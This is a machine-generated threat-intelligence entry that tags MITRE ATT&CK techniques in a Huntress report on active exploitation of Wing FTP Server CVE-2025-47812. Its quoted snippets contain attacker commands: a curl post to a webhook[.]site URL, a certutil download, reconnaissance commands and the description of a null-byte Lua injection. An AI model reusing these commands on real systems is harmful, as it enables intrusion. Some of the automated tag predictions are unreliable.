TTPwire Vol. 1 · MITRE ATT&CK Tagged


Huntress

Wing FTP Server RCE (CVE-2025-47812) Exploited in the Wild | Huntress

2025-07-10

ATT&CK techniques detected

18 predictions
T1059.001 PowerShell
99%
“…, and extracted the connection string from it: instance-y9tbyl-relay.screenconnect[.]com. There was no evidence that they tried to run the MSI file or that ScreenConnect was installed. At this point, they may have “phoned a friend” since another attacker connected to t…”
T1059.003 Windows Command Shell
98%
“…e /c c:/1.bat - c:\windows\system32\cmd.exe /c cmd.exe /c c:/1.bat - c:\windows\system32\cmd.exe /c whoami A Lua file appeared on the system, which would have effectively downloaded the aforementioned missing batch file, except that they messed up t…”
T1059.001 PowerShell
97%
“…heading” (SOH) character. It’s unclear how or why they even managed to type that out. There were also tabs in the paths for the test file where they had redirected their output for some reason, which resulted in failure: Figure 3: Visual of just how badly typed some of the…”
T1136.001 Local Account
94%
“…a - c:\windows\system32\cmd.exe /c curl -help - c:\windows\system32\cmd.exe /c whoami - c:\windows\system32\cmd.exe /c nslookup - c:\windows\system32\cmd.exe /c whoami -all We also observed the adversary creating new users for persistence: -…”
T1059.003 Windows Command Shell
93%
“…information. A typical session file may look as such: _SESSION['username']=[[johndoe]] _SESSION['ipaddress']=[[123.123.123.123]] _SESSION['currentpath']=[[/]] To contrast, our adversary passed a valid Lua function that contained a hex-enc…”
T1059.003 Windows Command Shell
87%
“…could connect to the victim’s machine. They made several connection attempts within a 12-minute time span. Almost an hour later, connections began from a second IP address, attempting several connection attempts. Figure 2: Timeline of first series of the attacks At this poin…”
T1059.003 Windows Command Shell
86%
“…c curl -help - c:\windows\system32\cmd.exe /c curl -s -d con https://webhook[.]site/5d112487-6133-4942-ac87-3f473d44bd81 > nul While the webhook endpoint is now expired and offline, we could see the connection made from the target host, including the …”
T1190 Exploit Public-Facing Application
82%
“…21. [01] Mon, 07 Jul 2025 12:51:24 FTPS server starts listening on port 990. [01] Mon, 07 Jul 2025 12:51:24 HTTP server starts listening on port 80. [01] Mon, 07 Jul 2025 12:51:24 HTTPS server starts listening on port 443. [06] Mon, 07 Jul 2025 12:56:26 (…”
T1059.006 Python
79%
“…SESSION['currentpath']=[[/]] If we decode the hex blob in the hx() function above using Python, we get the following command, which was attempted to execute on the host: % python3 -c 'print(bytes.fromhex("").decode("ascii"))' certutil -urlcache -f…”
T1190 Exploit Public-Facing Application
77%
“…using the null byte in the username parameter. Huntress first observed exploitation on a customer on July 1, 2025, just a day after the initial write-up was published. Exploitation activity underneath the Wing FTP Server process wftpserver.exe began to ramp up at 16:15 UTC a…”
T1190 Exploit Public-Facing Application
56%
“Wing FTP Server RCE (CVE-2025-47812) Exploited in the Wild | Huntress Summary TL;DR: Huntress saw active exploitation of Wing FTP Server remote code execution (CVE-2025-47812) on a customer on July 1, 2025. Organizations running Wing FTP Server should update to the…”
T1564.003 Hidden Window
56%
“…, and extracted the connection string from it: instance-y9tbyl-relay.screenconnect[.]com. There was no evidence that they tried to run the MSI file or that ScreenConnect was installed. At this point, they may have “phoned a friend” since another attacker connected to t…”
T1059.003 Windows Command Shell
54%
“…[/]] They then tried to run their batch file one more time. This must have been frustrating for them when it didn’t work: c:\windows\system32\cmd.exe /c cmd.exe /c c:/1.bat Figure 6: Attacker (probably) trying to figure out why they are failing At this poi…”
T1071.001 Web Protocols
52%
“…could connect to the victim’s machine. They made several connection attempts within a 12-minute time span. Almost an hour later, connections began from a second IP address, attempting several connection attempts. Figure 2: Timeline of first series of the attacks At this poin…”
T1204.002 Malicious File
47%
“…ver.exe process, as well as entries at the same time in the Application event log with IDs 1000 and 1001 for wftpserver.exe. c:\windows\system32\werfault.exe -u -p 3792 -s 4744 Thus concluded the painful journey of these attackers, as the machine was also isolate…”
T1033 System Owner/User Discovery
45%
“…32\cmd.exe /c net user - c:\windows\system32\cmd.exe /c net user /all - c:\windows\system32\cmd.exe /c whoami - c:\windows\system32\cmd.exe /c net user wing - c:\windows\system32\cmd.exe /c arp -a - c:\windows\system32\cmd.exe /…”
T1087.001 Local Account
40%
“…32\cmd.exe /c net user - c:\windows\system32\cmd.exe /c net user /all - c:\windows\system32\cmd.exe /c whoami - c:\windows\system32\cmd.exe /c net user wing - c:\windows\system32\cmd.exe /c arp -a - c:\windows\system32\cmd.exe /…”
T1195.002 Compromise Software Supply Chain
31%
“…ver.exe process, as well as entries at the same time in the Application event log with IDs 1000 and 1001 for wftpserver.exe. c:\windows\system32\werfault.exe -u -p 3792 -s 4744 Thus concluded the painful journey of these attackers, as the machine was also isolate…”

Summary

Huntress discovered active exploitation of Wing FTP Server RCE (CVE-2025-47812). Learn more about the injection flaw, attack timeline, forensic artifacts, and how to protect your organization.